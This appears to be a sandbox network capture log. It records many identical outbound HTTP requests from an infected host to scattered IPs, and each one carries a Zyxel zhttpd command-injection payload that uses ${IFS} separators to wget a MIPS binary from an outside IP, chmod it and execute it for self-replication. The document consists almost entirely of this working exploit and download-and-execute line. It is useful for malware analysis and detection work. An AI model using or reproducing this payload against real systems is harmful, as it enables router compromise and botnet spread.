                                                      Feb 2, 2024 06:36:08.979625940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8258192.168.2.1460234128.136.50.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979650021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8259192.168.2.145045814.91.55.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979686975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8260192.168.2.1457434126.244.237.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979737043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8261192.168.2.144429659.18.157.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979783058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8262192.168.2.1441364189.28.46.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979811907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8263192.168.2.1455954107.103.2.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979841948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8264192.168.2.145898431.87.155.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979901075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8265192.168.2.145598867.41.60.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979928970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8266192.168.2.145375688.173.112.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.979944944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8267192.168.2.1455526119.109.223.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980005980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8268192.168.2.143871413.99.122.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980036020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8269192.168.2.1459460108.207.166.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980089903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8270192.168.2.1438912200.59.134.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980129004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8271192.168.2.1445604176.161.64.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980170965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8272192.168.2.1451534157.188.59.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980207920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8273192.168.2.1436064204.144.229.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980238914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8274192.168.2.1458556193.57.227.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980302095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8275192.168.2.1438742193.186.131.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980331898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8276192.168.2.1438514125.156.209.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980379105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8277192.168.2.146076288.156.81.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980405092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8278192.168.2.1451072182.237.69.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980444908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8279192.168.2.14371584.230.85.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980500937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8280192.168.2.1444556121.183.139.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980546951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8281192.168.2.144403859.145.129.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980567932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8282192.168.2.145272681.248.69.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980627060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8283192.168.2.1451252150.250.232.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980669975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8284192.168.2.143358297.11.31.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980706930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8285192.168.2.145135689.91.210.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980743885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8286192.168.2.145591212.161.19.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980811119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8287192.168.2.1453584175.230.31.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980870962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8288192.168.2.1437198213.222.188.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980899096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8289192.168.2.1436214141.254.209.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980954885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8290192.168.2.1455816150.238.52.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.980986118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8291192.168.2.144174685.207.163.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981012106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8292192.168.2.1455144163.232.170.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981050014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8293192.168.2.145950641.50.15.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981086016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8294192.168.2.14552269.246.54.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981129885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8295192.168.2.1440596189.153.4.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981216908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8296192.168.2.1443354212.58.48.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981245995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8297192.168.2.143804095.235.15.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981292009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8298192.168.2.1456232222.46.38.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981347084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8299192.168.2.144494270.26.147.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981406927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8300192.168.2.145720431.169.244.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981456995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8301192.168.2.145266813.11.75.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981502056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8302192.168.2.1435982173.71.107.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981551886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8303192.168.2.144076837.200.91.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981611967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8304192.168.2.1460694176.151.108.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981637955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8305192.168.2.1441226139.214.219.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981678963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8306192.168.2.144136262.239.21.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981734037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8307192.168.2.144361627.124.108.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981765032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8308192.168.2.1445588151.74.248.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981817961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8309192.168.2.143479695.81.115.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981854916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8310192.168.2.144958465.55.224.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981894970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8311192.168.2.145692089.225.161.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981941938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8312192.168.2.1433236111.34.125.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.981975079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8313192.168.2.143675039.240.143.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982029915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8314192.168.2.1440090124.164.240.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982067108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8315192.168.2.145774083.130.133.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982115030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8316192.168.2.1448328165.181.35.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982136965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8317192.168.2.1436018177.100.84.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982177019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8318192.168.2.1444068173.89.98.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982217073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8319192.168.2.1447720121.6.150.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.982266903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8320192.168.2.143775413.202.84.169443
                                                      TimestampBytes transferredDirectionData
